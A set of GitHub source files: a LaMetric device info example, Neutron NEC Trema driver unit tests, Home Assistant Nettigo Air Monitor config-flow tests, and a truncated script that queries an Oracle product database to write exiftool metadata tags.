"id": "ee1fa12e8e325f4b6125c01a6d8fbca50826103a",
"size": "12709",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "neutron/plugins/ml2/drivers/mech_agent.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "Mako",
"bytes": "1047"
},
{
"name": "Python",
"bytes": "11420614"
},
{
"name": "Shell",
"bytes": "38791"
}
],
"symlink_target": ""
} |
from pprint import pprint
from lmnotify import LaMetricManager
def main():
# create an instance of the LaMetricManager
lmn = LaMetricManager()
# --- test cloud ---
# get the user
print("USER\n")
pprint(lmn.get_user(), indent=2)
# get devices
devices = lmn.get_devices()
print("\nDEVICES\n")
pprint(devices, indent=2)
# --- test local device ---
# use first device to do some tests
lmn.set_device(devices[0])
# get all available API endpoints
print("\nENDPOINTS\n")
pprint(lmn.get_endpoint_map(), indent=2)
# get the state of the device
print("\nDEVICE\n")
pprint(lmn.get_device_state(), indent=2)
# get display brightness
print("\nDISPLAY\n")
pprint(lmn.get_display(), indent=2)
# get the volume
print("\nVOLUME\n")
pprint(lmn.get_volume(), indent=2)
# get the bluetooth state
print("\nBLUETOOTH\n")
pprint(lmn.get_bluetooth_state(), indent=2)
# get the wifi state
print("\nWIFI\n")
pprint(lmn.get_wifi_state(), indent=2)
if __name__ == "__main__":
main()
| {
"content_hash": "4a696eb94dd1fd686603950e9ed671ec",
"timestamp": "",
"source": "github",
"line_count": 53,
"max_line_length": 47,
"avg_line_length": 20.77358490566038,
"alnum_prop": 0.6167120799273388,
"repo_name": "keans/lmnotify",
"id": "5c4d336e2810f1fcab3708e365ed0833478e4d6d",
"size": "1148",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "examples/info.py",
"mode": "33261",
"license": "mit",
"language": [
{
"name": "Python",
"bytes": "43799"
}
],
"symlink_target": ""
} |
import random
import mock
from neutron.openstack.common import uuidutils
from neutron.plugins.nec.common import ofc_client
from neutron.plugins.nec.db import models as nmodels
from neutron.plugins.nec import drivers
from neutron.tests import base
class TestConfig(object):
"""Configuration for this test."""
host = '127.0.0.1'
port = 8888
class TremaDriverTestBase(base.BaseTestCase):
driver_name = "trema"
def setUp(self):
super(TremaDriverTestBase, self).setUp()
self.driver = drivers.get_driver(self.driver_name)(TestConfig)
self.do_request = mock.patch.object(ofc_client.OFCClient,
'do_request').start()
def get_ofc_item_random_params(self):
"""create random parameters for ofc_item test."""
tenant_id = uuidutils.generate_uuid()
network_id = uuidutils.generate_uuid()
port_id = uuidutils.generate_uuid()
mac = ':'.join(['%x' % random.randint(0, 255) for i in xrange(6)])
portinfo = nmodels.PortInfo(id=port_id, datapath_id="0x123456789",
port_no=1234, vlan_id=321,
mac=mac)
return tenant_id, network_id, portinfo
class TremaDriverNetworkTestBase(TremaDriverTestBase):
def test_create_tenant(self):
t, n, p = self.get_ofc_item_random_params()
ret = self.driver.create_tenant('dummy_desc', t)
ofc_t_path = "/tenants/%s" % t
self.assertEqual(ofc_t_path, ret)
# There is no API call.
self.assertEqual(0, self.do_request.call_count)
def test_update_tenant(self):
t, n, p = self.get_ofc_item_random_params()
path = "/tenants/%s" % t
self.driver.update_tenant(path, 'dummy_desc')
# There is no API call.
self.assertEqual(0, self.do_request.call_count)
def testc_delete_tenant(self):
t, n, p = self.get_ofc_item_random_params()
path = "/tenants/%s" % t
self.driver.delete_tenant(path)
# There is no API call.
self.assertEqual(0, self.do_request.call_count)
def testa_create_network(self):
t, n, p = self.get_ofc_item_random_params()
description = "desc of %s" % n
body = {'id': n, 'description': description}
ret = self.driver.create_network(t, description, n)
self.do_request.assert_called_once_with("POST", "/networks", body=body)
self.assertEqual(ret, '/networks/%s' % n)
def testc_delete_network(self):
t, n, p = self.get_ofc_item_random_params()
net_path = "/networks/%s" % n
self.driver.delete_network(net_path)
self.do_request.assert_called_once_with("DELETE", net_path)
class TremaPortBaseDriverTest(TremaDriverNetworkTestBase):
driver_name = "trema_port"
def test_filter_supported(self):
self.assertTrue(self.driver.filter_supported())
def testd_create_port(self):
_t, n, p = self.get_ofc_item_random_params()
net_path = "/networks/%s" % n
body = {'id': p.id,
'datapath_id': p.datapath_id,
'port': str(p.port_no),
'vid': str(p.vlan_id)}
ret = self.driver.create_port(net_path, p, p.id)
self.do_request.assert_called_once_with(
"POST", "/networks/%s/ports" % n, body=body)
self.assertEqual(ret, '/networks/%s/ports/%s' % (n, p.id))
def testd_delete_port(self):
t, n, p = self.get_ofc_item_random_params()
p_path = "/networks/%s/ports/%s" % (n, p.id)
self.driver.delete_port(p_path)
self.do_request.assert_called_once_with("DELETE", p_path)
class TremaPortMACBaseDriverTest(TremaDriverNetworkTestBase):
driver_name = "trema_portmac"
def test_filter_supported(self):
self.assertTrue(self.driver.filter_supported())
def testd_create_port(self):
t, n, p = self.get_ofc_item_random_params()
dummy_port = "dummy-%s" % p.id
net_path = "/networks/%s" % n
path_1 = "/networks/%s/ports" % n
body_1 = {'id': dummy_port,
'datapath_id': p.datapath_id,
'port': str(p.port_no),
'vid': str(p.vlan_id)}
path_2 = "/networks/%s/ports/%s/attachments" % (n, dummy_port)
body_2 = {'id': p.id, 'mac': p.mac}
path_3 = "/networks/%s/ports/%s" % (n, dummy_port)
ret = self.driver.create_port(net_path, p, p.id)
self.do_request.assert_has_calls([
mock.call("POST", path_1, body=body_1),
mock.call("POST", path_2, body=body_2),
mock.call("DELETE", path_3)
])
port_path = "/networks/%s/ports/%s/attachments/%s" % (n, dummy_port,
p.id)
self.assertEqual(ret, port_path)
def testd_delete_port(self):
t, n, p = self.get_ofc_item_random_params()
dummy_port = "dummy-%s" % p.id
path = "/networks/%s/ports/%s/attachments/%s" % (n, dummy_port, p.id)
self.driver.delete_port(path)
self.do_request.assert_called_once_with("DELETE", path)
class TremaMACBaseDriverTest(TremaDriverNetworkTestBase):
driver_name = "trema_mac"
def test_filter_supported(self):
self.assertFalse(self.driver.filter_supported())
def testd_create_port(self):
t, n, p = self.get_ofc_item_random_params()
net_path = "/networks/%s" % n
path = "/networks/%s/attachments" % n
body = {'id': p.id, 'mac': p.mac}
ret = self.driver.create_port(net_path, p, p.id)
self.do_request.assert_called_once_with("POST", path, body=body)
self.assertEqual(ret, '/networks/%s/attachments/%s' % (n, p.id))
def testd_delete_port(self):
t, n, p = self.get_ofc_item_random_params()
path = "/networks/%s/attachments/%s" % (n, p.id)
self.driver.delete_port(path)
self.do_request.assert_called_once_with("DELETE", path)
class TremaFilterDriverTest(TremaDriverTestBase):
def _test_create_filter(self, filter_dict=None, filter_post=None,
filter_wildcards=None, no_portinfo=False):
t, n, p = self.get_ofc_item_random_params()
src_mac = ':'.join(['%x' % random.randint(0, 255) for i in xrange(6)])
if filter_wildcards is None:
filter_wildcards = []
f = {'tenant_id': t,
'id': uuidutils.generate_uuid(),
'network_id': n,
'priority': 123,
'action': "ACCEPT",
'in_port': p.id,
'src_mac': src_mac,
'dst_mac': "",
'eth_type': 0,
'src_cidr': "",
'dst_cidr': "",
'src_port': 0,
'dst_port': 0,
'protocol': "TCP",
'admin_state_up': True,
'status': "ACTIVE"}
if filter_dict:
f.update(filter_dict)
net_path = "/networks/%s" % n
all_wildcards_ofp = ['dl_vlan', 'dl_vlan_pcp', 'nw_tos',
'in_port', 'dl_src', 'dl_dst',
'nw_src', 'nw_dst',
'dl_type', 'nw_proto',
'tp_src', 'tp_dst']
all_wildcards_non_ofp = ['in_datapath_id', 'slice']
body = {'id': f['id'],
'action': 'ALLOW',
'priority': 123,
'slice': n,
'in_datapath_id': '0x123456789',
'in_port': 1234,
'nw_proto': '0x6',
'dl_type': '0x800',
'dl_src': src_mac}
if filter_post:
body.update(filter_post)
if no_portinfo:
filter_wildcards += ['in_datapath_id', 'in_port']
p = None
for field in filter_wildcards:
if field in body:
del body[field]
ofp_wildcards = ["%s:32" % _f if _f in ['nw_src', 'nw_dst'] else _f
for _f in all_wildcards_ofp if _f not in body]
body['ofp_wildcards'] = set(ofp_wildcards)
non_ofp_wildcards = [_f for _f in all_wildcards_non_ofp
if _f not in body]
if non_ofp_wildcards:
body['wildcards'] = set(non_ofp_wildcards)
ret = self.driver.create_filter(net_path, f, p, f['id'])
# The content of 'body' is checked below.
self.do_request.assert_called_once_with("POST", "/filters",
body=mock.ANY)
self.assertEqual(ret, '/filters/%s' % f['id'])
# ofp_wildcards and wildcards in body are comma-separated
# string but the order of elements are not considered,
# so we check these fields as set.
actual_body = self.do_request.call_args[1]['body']
if 'ofp_wildcards' in actual_body:
ofp_wildcards = actual_body['ofp_wildcards'].split(',')
actual_body['ofp_wildcards'] = set(ofp_wildcards)
if 'wildcards' in actual_body:
actual_body['wildcards'] = set(actual_body['wildcards'].split(','))
self.assertEqual(body, actual_body)
def test_create_filter_accept(self):
self._test_create_filter(filter_dict={'action': 'ACCEPT'})
def test_create_filter_allow(self):
self._test_create_filter(filter_dict={'action': 'ALLOW'})
def test_create_filter_deny(self):
self._test_create_filter(filter_dict={'action': 'DENY'},
filter_post={'action': 'DENY'})
def test_create_filter_drop(self):
self._test_create_filter(filter_dict={'action': 'DROP'},
filter_post={'action': 'DENY'})
def test_create_filter_no_port(self):
self._test_create_filter(no_portinfo=True)
def test_create_filter_src_mac_wildcard(self):
self._test_create_filter(filter_dict={'src_mac': ''},
filter_wildcards=['dl_src'])
def test_create_filter_dst_mac(self):
dst_mac = ':'.join(['%x' % random.randint(0, 255) for i in xrange(6)])
self._test_create_filter(filter_dict={'dst_mac': dst_mac},
filter_post={'dl_dst': dst_mac})
def test_create_filter_src_cidr(self):
src_cidr = '10.2.0.0/24'
self._test_create_filter(filter_dict={'src_cidr': src_cidr},
filter_post={'nw_src': src_cidr})
def test_create_filter_dst_cidr(self):
dst_cidr = '192.168.10.0/24'
self._test_create_filter(filter_dict={'dst_cidr': dst_cidr},
filter_post={'nw_dst': dst_cidr})
def test_create_filter_proto_icmp(self):
self._test_create_filter(
filter_dict={'protocol': 'icmp'},
filter_post={'dl_type': '0x800', 'nw_proto': '0x1'})
def test_create_filter_proto_tcp(self):
self._test_create_filter(
filter_dict={'protocol': 'tcp'},
filter_post={'dl_type': '0x800', 'nw_proto': '0x6'})
def test_create_filter_proto_udp(self):
self._test_create_filter(
filter_dict={'protocol': 'udp'},
filter_post={'dl_type': '0x800', 'nw_proto': '0x11'})
def test_create_filter_proto_arp(self):
self._test_create_filter(
filter_dict={'protocol': 'arp'},
filter_post={'dl_type': '0x806'},
filter_wildcards=['nw_proto'])
def test_create_filter_proto_misc(self):
self._test_create_filter(
filter_dict={'protocol': '0x33', 'eth_type': '0x900'},
filter_post={'dl_type': '0x900', 'nw_proto': '0x33'})
def test_create_filter_proto_misc_dl_type_wildcard(self):
self._test_create_filter(
filter_dict={'protocol': '0x33', 'ether_type': ''},
filter_post={'nw_proto': '0x33'},
filter_wildcards=['dl_type'])
def test_create_filter_proto_wildcard(self):
self._test_create_filter(
filter_dict={'protocol': ''},
filter_wildcards=['dl_type', 'nw_proto'])
def test_create_filter_src_dst_port(self):
self._test_create_filter(filter_dict={'src_port': 8192,
'dst_port': 4096},
filter_post={'tp_src': '0x2000',
'tp_dst': '0x1000'})
def testb_delete_filter(self):
t, n, p = self.get_ofc_item_random_params()
f_path = "/filters/%s" % uuidutils.generate_uuid()
self.driver.delete_filter(f_path)
self.do_request.assert_called_once_with("DELETE", f_path)
| {
"content_hash": "af14972e6761db5b58f93bf82b9cbd9d",
"timestamp": "",
"source": "github",
"line_count": 332,
"max_line_length": 79,
"avg_line_length": 38.25301204819277,
"alnum_prop": 0.5451968503937008,
"repo_name": "zhhf/charging",
"id": "0eb219f985cf0a15f575cccafd3752f1db8440e2",
"size": "13398",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "charging/tests/unit/nec/test_trema_driver.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "CSS",
"bytes": "37307"
},
{
"name": "JavaScript",
"bytes": "67930"
},
{
"name": "Python",
"bytes": "8696203"
},
{
"name": "Shell",
"bytes": "8920"
},
{
"name": "XSLT",
"bytes": "50907"
}
],
"symlink_target": ""
} |
"""Define tests for the Nettigo Air Monitor config flow."""
import asyncio
from unittest.mock import patch
from nettigo_air_monitor import ApiError, AuthFailed, CannotGetMac
import pytest
from homeassistant import data_entry_flow
from homeassistant.components import zeroconf
from homeassistant.components.nam.const import DOMAIN
from homeassistant.config_entries import SOURCE_REAUTH, SOURCE_USER, SOURCE_ZEROCONF
from tests.common import MockConfigEntry
DISCOVERY_INFO = zeroconf.ZeroconfServiceInfo(
host="10.10.2.3",
hostname="mock_hostname",
name="mock_name",
port=None,
properties={},
type="mock_type",
)
VALID_CONFIG = {"host": "10.10.2.3"}
VALID_AUTH = {"username": "fake_username", "password": "fake_password"}
async def test_form_create_entry_without_auth(hass):
"""Test that the user step without auth works."""
result = await hass.config_entries.flow.async_init(
DOMAIN, context={"source": SOURCE_USER}
)
assert result["type"] == data_entry_flow.RESULT_TYPE_FORM
assert result["step_id"] == SOURCE_USER
assert result["errors"] == {}
with patch("homeassistant.components.nam.NettigoAirMonitor.initialize"), patch(
"homeassistant.components.nam.NettigoAirMonitor.async_get_mac_address",
return_value="aa:bb:cc:dd:ee:ff",
), patch(
"homeassistant.components.nam.async_setup_entry", return_value=True
) as mock_setup_entry:
result = await hass.config_entries.flow.async_configure(
result["flow_id"],
VALID_CONFIG,
)
await hass.async_block_till_done()
assert result["type"] == data_entry_flow.RESULT_TYPE_CREATE_ENTRY
assert result["title"] == "10.10.2.3"
assert result["data"]["host"] == "10.10.2.3"
assert len(mock_setup_entry.mock_calls) == 1
async def test_form_create_entry_with_auth(hass):
"""Test that the user step with auth works."""
result = await hass.config_entries.flow.async_init(
DOMAIN, context={"source": SOURCE_USER}
)
assert result["type"] == data_entry_flow.RESULT_TYPE_FORM
assert result["step_id"] == SOURCE_USER
assert result["errors"] == {}
with patch(
"homeassistant.components.nam.NettigoAirMonitor.initialize",
side_effect=AuthFailed("Auth Error"),
):
result = await hass.config_entries.flow.async_configure(
result["flow_id"],
VALID_CONFIG,
)
await hass.async_block_till_done()
assert result["type"] == data_entry_flow.RESULT_TYPE_FORM
assert result["step_id"] == "credentials"
with patch("homeassistant.components.nam.NettigoAirMonitor.initialize"), patch(
"homeassistant.components.nam.NettigoAirMonitor.async_get_mac_address",
return_value="aa:bb:cc:dd:ee:ff",
), patch(
"homeassistant.components.nam.async_setup_entry", return_value=True
) as mock_setup_entry:
result = await hass.config_entries.flow.async_configure(
result["flow_id"],
VALID_AUTH,
)
await hass.async_block_till_done()
assert result["type"] == data_entry_flow.RESULT_TYPE_CREATE_ENTRY
assert result["title"] == "10.10.2.3"
assert result["data"]["host"] == "10.10.2.3"
assert result["data"]["username"] == "fake_username"
assert result["data"]["password"] == "fake_password"
assert len(mock_setup_entry.mock_calls) == 1
async def test_reauth_successful(hass):
"""Test starting a reauthentication flow."""
entry = MockConfigEntry(
domain=DOMAIN,
title="10.10.2.3",
unique_id="aa:bb:cc:dd:ee:ff",
data={"host": "10.10.2.3"},
)
entry.add_to_hass(hass)
with patch("homeassistant.components.nam.NettigoAirMonitor.initialize"), patch(
"homeassistant.components.nam.NettigoAirMonitor.async_get_mac_address",
return_value="aa:bb:cc:dd:ee:ff",
):
result = await hass.config_entries.flow.async_init(
DOMAIN,
context={"source": SOURCE_REAUTH, "entry_id": entry.entry_id},
data=entry.data,
)
assert result["type"] == data_entry_flow.RESULT_TYPE_FORM
assert result["step_id"] == "reauth_confirm"
result = await hass.config_entries.flow.async_configure(
result["flow_id"],
user_input=VALID_AUTH,
)
assert result["type"] == data_entry_flow.RESULT_TYPE_ABORT
assert result["reason"] == "reauth_successful"
async def test_reauth_unsuccessful(hass):
"""Test starting a reauthentication flow."""
entry = MockConfigEntry(
domain=DOMAIN,
title="10.10.2.3",
unique_id="aa:bb:cc:dd:ee:ff",
data={"host": "10.10.2.3"},
)
entry.add_to_hass(hass)
with patch(
"homeassistant.components.nam.NettigoAirMonitor.initialize",
side_effect=ApiError("API Error"),
):
result = await hass.config_entries.flow.async_init(
DOMAIN,
context={"source": SOURCE_REAUTH, "entry_id": entry.entry_id},
data=entry.data,
)
assert result["type"] == data_entry_flow.RESULT_TYPE_FORM
assert result["step_id"] == "reauth_confirm"
result = await hass.config_entries.flow.async_configure(
result["flow_id"],
user_input=VALID_AUTH,
)
assert result["type"] == data_entry_flow.RESULT_TYPE_ABORT
assert result["reason"] == "reauth_unsuccessful"
@pytest.mark.parametrize(
"error",
[
(ApiError("API Error"), "cannot_connect"),
(AuthFailed("Auth Error"), "invalid_auth"),
(asyncio.TimeoutError, "cannot_connect"),
(ValueError, "unknown"),
],
)
async def test_form_with_auth_errors(hass, error):
"""Test we handle errors when auth is required."""
exc, base_error = error
with patch(
"homeassistant.components.nam.NettigoAirMonitor.initialize",
side_effect=AuthFailed("Auth Error"),
):
result = await hass.config_entries.flow.async_init(
DOMAIN,
context={"source": SOURCE_USER},
data=VALID_CONFIG,
)
assert result["type"] == data_entry_flow.RESULT_TYPE_FORM
assert result["step_id"] == "credentials"
with patch(
"homeassistant.components.nam.NettigoAirMonitor.initialize",
side_effect=exc,
):
result = await hass.config_entries.flow.async_configure(
result["flow_id"],
VALID_AUTH,
)
assert result["errors"] == {"base": base_error}
@pytest.mark.parametrize(
"error",
[
(ApiError("API Error"), "cannot_connect"),
(asyncio.TimeoutError, "cannot_connect"),
(ValueError, "unknown"),
],
)
async def test_form_errors(hass, error):
"""Test we handle errors."""
exc, base_error = error
with patch(
"homeassistant.components.nam.NettigoAirMonitor.initialize",
side_effect=exc,
):
result = await hass.config_entries.flow.async_init(
DOMAIN,
context={"source": SOURCE_USER},
data=VALID_CONFIG,
)
assert result["errors"] == {"base": base_error}
async def test_form_abort(hass):
"""Test we handle abort after error."""
with patch("homeassistant.components.nam.NettigoAirMonitor.initialize"), patch(
"homeassistant.components.nam.NettigoAirMonitor.async_get_mac_address",
side_effect=CannotGetMac("Cannot get MAC address from device"),
):
result = await hass.config_entries.flow.async_init(
DOMAIN,
context={"source": SOURCE_USER},
data=VALID_CONFIG,
)
assert result["type"] == data_entry_flow.RESULT_TYPE_ABORT
assert result["reason"] == "device_unsupported"
async def test_form_with_auth_abort(hass):
"""Test we handle abort after error."""
with patch(
"homeassistant.components.nam.NettigoAirMonitor.initialize",
side_effect=AuthFailed("Auth Error"),
):
result = await hass.config_entries.flow.async_init(
DOMAIN,
context={"source": SOURCE_USER},
data=VALID_CONFIG,
)
assert result["type"] == data_entry_flow.RESULT_TYPE_FORM
assert result["step_id"] == "credentials"
with patch("homeassistant.components.nam.NettigoAirMonitor.initialize"), patch(
"homeassistant.components.nam.NettigoAirMonitor.async_get_mac_address",
side_effect=CannotGetMac("Cannot get MAC address from device"),
):
result = await hass.config_entries.flow.async_configure(
result["flow_id"],
VALID_AUTH,
)
assert result["type"] == data_entry_flow.RESULT_TYPE_ABORT
assert result["reason"] == "device_unsupported"
async def test_form_already_configured(hass):
"""Test that errors are shown when duplicates are added."""
entry = MockConfigEntry(
domain=DOMAIN, unique_id="aa:bb:cc:dd:ee:ff", data=VALID_CONFIG
)
entry.add_to_hass(hass)
result = await hass.config_entries.flow.async_init(
DOMAIN, context={"source": SOURCE_USER}
)
with patch("homeassistant.components.nam.NettigoAirMonitor.initialize"), patch(
"homeassistant.components.nam.NettigoAirMonitor.async_get_mac_address",
return_value="aa:bb:cc:dd:ee:ff",
):
result = await hass.config_entries.flow.async_configure(
result["flow_id"],
{"host": "1.1.1.1"},
)
assert result["type"] == data_entry_flow.RESULT_TYPE_ABORT
assert result["reason"] == "already_configured"
# Test config entry got updated with latest IP
assert entry.data["host"] == "1.1.1.1"
async def test_zeroconf(hass):
"""Test we get the form."""
with patch("homeassistant.components.nam.NettigoAirMonitor.initialize"), patch(
"homeassistant.components.nam.NettigoAirMonitor.async_get_mac_address",
return_value="aa:bb:cc:dd:ee:ff",
):
result = await hass.config_entries.flow.async_init(
DOMAIN,
data=DISCOVERY_INFO,
context={"source": SOURCE_ZEROCONF},
)
context = next(
flow["context"]
for flow in hass.config_entries.flow.async_progress()
if flow["flow_id"] == result["flow_id"]
)
assert result["type"] == data_entry_flow.RESULT_TYPE_FORM
assert result["errors"] == {}
assert context["title_placeholders"]["host"] == "10.10.2.3"
assert context["confirm_only"] is True
with patch(
"homeassistant.components.nam.async_setup_entry",
return_value=True,
) as mock_setup_entry:
result = await hass.config_entries.flow.async_configure(
result["flow_id"],
{},
)
await hass.async_block_till_done()
assert result["type"] == data_entry_flow.RESULT_TYPE_CREATE_ENTRY
assert result["title"] == "10.10.2.3"
assert result["data"] == {"host": "10.10.2.3"}
assert len(mock_setup_entry.mock_calls) == 1
async def test_zeroconf_with_auth(hass):
"""Test that the zeroconf step with auth works."""
with patch(
"homeassistant.components.nam.NettigoAirMonitor.initialize",
side_effect=AuthFailed("Auth Error"),
):
result = await hass.config_entries.flow.async_init(
DOMAIN,
data=DISCOVERY_INFO,
context={"source": SOURCE_ZEROCONF},
)
context = next(
flow["context"]
for flow in hass.config_entries.flow.async_progress()
if flow["flow_id"] == result["flow_id"]
)
assert result["type"] == data_entry_flow.RESULT_TYPE_FORM
assert result["step_id"] == "credentials"
assert result["errors"] == {}
assert context["title_placeholders"]["host"] == "10.10.2.3"
with patch("homeassistant.components.nam.NettigoAirMonitor.initialize"), patch(
"homeassistant.components.nam.NettigoAirMonitor.async_get_mac_address",
return_value="aa:bb:cc:dd:ee:ff",
), patch(
"homeassistant.components.nam.async_setup_entry", return_value=True
) as mock_setup_entry:
result = await hass.config_entries.flow.async_configure(
result["flow_id"],
VALID_AUTH,
)
await hass.async_block_till_done()
assert result["type"] == data_entry_flow.RESULT_TYPE_CREATE_ENTRY
assert result["title"] == "10.10.2.3"
assert result["data"]["host"] == "10.10.2.3"
assert result["data"]["username"] == "fake_username"
assert result["data"]["password"] == "fake_password"
assert len(mock_setup_entry.mock_calls) == 1
async def test_zeroconf_host_already_configured(hass):
"""Test that errors are shown when host is already configured."""
entry = MockConfigEntry(
domain=DOMAIN, unique_id="aa:bb:cc:dd:ee:ff", data=VALID_CONFIG
)
entry.add_to_hass(hass)
result = await hass.config_entries.flow.async_init(
DOMAIN,
data=DISCOVERY_INFO,
context={"source": SOURCE_ZEROCONF},
)
assert result["type"] == data_entry_flow.RESULT_TYPE_ABORT
assert result["reason"] == "already_configured"
@pytest.mark.parametrize(
"error",
[
(ApiError("API Error"), "cannot_connect"),
(CannotGetMac("Cannot get MAC address from device"), "device_unsupported"),
],
)
async def test_zeroconf_errors(hass, error):
"""Test we handle errors."""
exc, reason = error
with patch(
"homeassistant.components.nam.NettigoAirMonitor.initialize",
side_effect=exc,
):
result = await hass.config_entries.flow.async_init(
DOMAIN,
data=DISCOVERY_INFO,
context={"source": SOURCE_ZEROCONF},
)
assert result["type"] == data_entry_flow.RESULT_TYPE_ABORT
assert result["reason"] == reason
| {
"content_hash": "aa6bdc1a9c3ceee01b00abf3132be5e7",
"timestamp": "",
"source": "github",
"line_count": 411,
"max_line_length": 84,
"avg_line_length": 33.80778588807786,
"alnum_prop": 0.6251889168765743,
"repo_name": "jawilson/home-assistant",
"id": "015c645a3e776a54b9053ff93b33e937e8e29ca7",
"size": "13895",
"binary": false,
"copies": "2",
"ref": "refs/heads/master",
"path": "tests/components/nam/test_config_flow.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "Dockerfile",
"bytes": "2782"
},
{
"name": "Python",
"bytes": "40129467"
},
{
"name": "Shell",
"bytes": "4910"
}
],
"symlink_target": ""
} |
"""
Created on Fri Oct 18 14:48:56 2014
@author: jb
"""
def sqlQueryMetatags(style,f):
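    # Query the POMGR/ATG snapshot tables for brand, category, event and
    # status details of the given colorstyle, returning a dict keyed by the
    # file path f whose value maps exiftool tag names to their values.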
import sqlalchemy
orcl_engine = sqlalchemy.create_engine('oracle+cx_oracle://jbragato:[email protected]:1531/dssprd1')
connection = orcl_engine.connect()
querymake_metatags="""SELECT DISTINCT
POMGR_SNP.PRODUCT_COLOR.ID AS colorstyle,
POMGR_SNP.BRAND.NAME AS brand,
POMGR_SNP.COLOR_GROUP.DESCRIPTION AS color_group,
POMGR_SNP.PRODUCT_FOLDER_DENORMALIZED.LABEL AS category_parent,
POMGR_SNP.PRODUCT_FOLDER.LABEL AS category_sub,
MAX(ATG_SNP.EVENT.ID) AS event_id,
ATG_SNP.EVENT.EVENT_DESCRIPTION AS event_title,
POMGR_SNP.PRODUCT_FOLDER_DENORMALIZED.PATH AS product_path,
ATG_SNP.EVENT.SHOT_LIST_DATE AS shot_list_dt,
ATG_SNP.EVENT.BRAND_EDITORIAL AS brand_editorial,
ATG_SNP.EVENT.CATEGORY AS cat_id,
POMGR_SNP.PRODUCT_COLOR.VENDOR_STYLE AS vendor_style,
POMGR_SNP.LK_PRODUCT_STATUS.NAME AS production_status
FROM
POMGR_SNP.PRODUCT_COLOR
LEFT JOIN ATG_SNP.EVENT_PRODUCT_COLOR
ON
POMGR_SNP.PRODUCT_COLOR.ID = ATG_SNP.EVENT_PRODUCT_COLOR.PRODUCT_COLOR_ID
LEFT JOIN POMGR_SNP.LK_PRODUCT_STATUS
ON
POMGR_SNP.PRODUCT_COLOR.PRODUCTION_STATUS_ID = POMGR_SNP.LK_PRODUCT_STATUS.ID
LEFT JOIN ATG_SNP.EVENT
ON
ATG_SNP.EVENT_PRODUCT_COLOR.EVENT_ID = ATG_SNP.EVENT.ID
LEFT JOIN POMGR_SNP.PRODUCT
ON
POMGR_SNP.PRODUCT_COLOR.PRODUCT_ID = POMGR_SNP.PRODUCT.ID
LEFT JOIN POMGR_SNP.PRODUCT_FOLDER
ON
POMGR_SNP.PRODUCT.PRODUCT_FOLDER_ID = POMGR_SNP.PRODUCT_FOLDER.ID
LEFT JOIN POMGR_SNP.BRAND
ON
POMGR_SNP.PRODUCT.BRAND_ID = POMGR_SNP.BRAND.ID
LEFT JOIN POMGR_SNP.PRODUCT_FOLDER_DENORMALIZED
ON
POMGR_SNP.PRODUCT_FOLDER.PARENT_PRODUCT_FOLDER_ID =
POMGR_SNP.PRODUCT_FOLDER_DENORMALIZED.ID
LEFT JOIN POMGR_SNP.COLOR_GROUP
ON
POMGR_SNP.PRODUCT_COLOR.COLOR_GROUP_ID = POMGR_SNP.COLOR_GROUP.ID
WHERE
POMGR_SNP.PRODUCT_COLOR.ID = COLORSTYLESEARCH
GROUP BY
POMGR_SNP.PRODUCT_COLOR.ID,
POMGR_SNP.BRAND.NAME,
POMGR_SNP.PRODUCT_FOLDER_DENORMALIZED.LABEL,
POMGR_SNP.PRODUCT_FOLDER.LABEL,
ATG_SNP.EVENT.EVENT_DESCRIPTION,
POMGR_SNP.COLOR_GROUP.DESCRIPTION,
POMGR_SNP.PRODUCT_FOLDER_DENORMALIZED.PATH,
POMGR_SNP.PRODUCT_COLOR.VENDOR_STYLE,
ATG_SNP.EVENT.SHOT_LIST_DATE,
ATG_SNP.EVENT.BRAND_EDITORIAL,
ATG_SNP.EVENT.CATEGORY,
POMGR_SNP.LK_PRODUCT_STATUS.NAME
ORDER BY
POMGR_SNP.PRODUCT_COLOR.ID DESC"""
## --POMGR_SNP.PRODUCT_COLOR.MODIFIED_DATE >= TRUNC(SysDate - 365)
## --RENAME INPUT VARIABLE PRIOR TO QUERY
querymake_metatags = querymake_metatags.replace('COLORSTYLESEARCH', str(style))
result = connection.execute(querymake_metatags)
metatags = {}
for row in result:
if row:
metatag = {}
# metatag['colorstyle'] = row['colorstyle']
# metatag['IPTC:PONumber'] = row['po_num']
metatag['IPTC:VendorStyle'] = row['vendor_style']
metatag['IPTC:Brand'] = row['brand']
metatag['XMP:Genre'] = row['color_group']
metatag['IPTC:ProductType'] = row['category_sub']
metatag['EventID'] = row['event_id']
try:
metatag['XMP:Album'] = "EventID " + str(row['event_id'])
except:
pass
metatag['IPTC:Credit'] = row['product_path']
metatag['IPTC:CopyrightNotice'] = row['brand']
metatag['IPTC:SpecialInstructions'] = row['production_status']
metatag['Keywords'] = row['category_parent']
metatag['IPTC:Source'] = row['shot_list_dt']
# metatag['IPTC:SpecialInstructions'] = '{:%Y-%m-%d}'.format(metatag['brand_editorial'])
# metatag['IPTC:SampleStatusDate'] = '{:%Y-%m-%d}'.format(row['sample_dt'])
# metatag['IPTC:Source'] = '{:%Y-%m-%d}'.format(row['sample_dt'])
# metatag['IPTC:Source'] = row['sample_dt']
# metatag['SourceFile'] = f
## file path as dict KEY
metatags[f] = metatag
## colorstyle as dict KEY
#metatags[row['colorstyle']] = metatag
else:
pass
connection.close()
return metatags
def get_dbinfo_for_metatags_singlefile(f):
import os
metafield_dict = {}
listed = []
stylefile = os.path.basename(f)
style = stylefile.split('_')[0]
#print style, f
### string = key/val as k=filepath, val=all metadata as k/v pairs
exiftoolstring = sqlQueryMetatags(style,f)
#pairs = zip(exiftoolstring.values(), exiftoolstring.keys())
for k,v in exiftoolstring.iteritems():
tmpd = {}
for val in v:
tmpd[val] = v[val]
listed.append(tmpd)
metafield_dict[k] = tmpd
return metafield_dict
#return listed
##################### Begin CMDS ##############
def main(filename=None):
import sys, os, glob, sqlalchemy
if not filename:
filename=os.path.abspath(sys.argv[1])
metadict = get_dbinfo_for_metatags_singlefile(filename)
exiftags = []
exifdict = {}
for k,v in metadict.items():
metatags = []
for val in v:
filename = str(k)
exiftag = val
exifvalue = v[val]
exifpart = "-'{exiftag}'='{exifvalue}'".format(exiftag=exiftag,exifvalue=exifvalue)
metatags.append(exifpart)
exifdict[filename] = " ".join(metatags)
execlist = []
for key,value in exifdict.iteritems():
execstring = "exiftool -m -overwrite_original_in_place -fast2 -q {0} {1}".format(value,key)
execlist.append(execstring)
for line in execlist:
try:
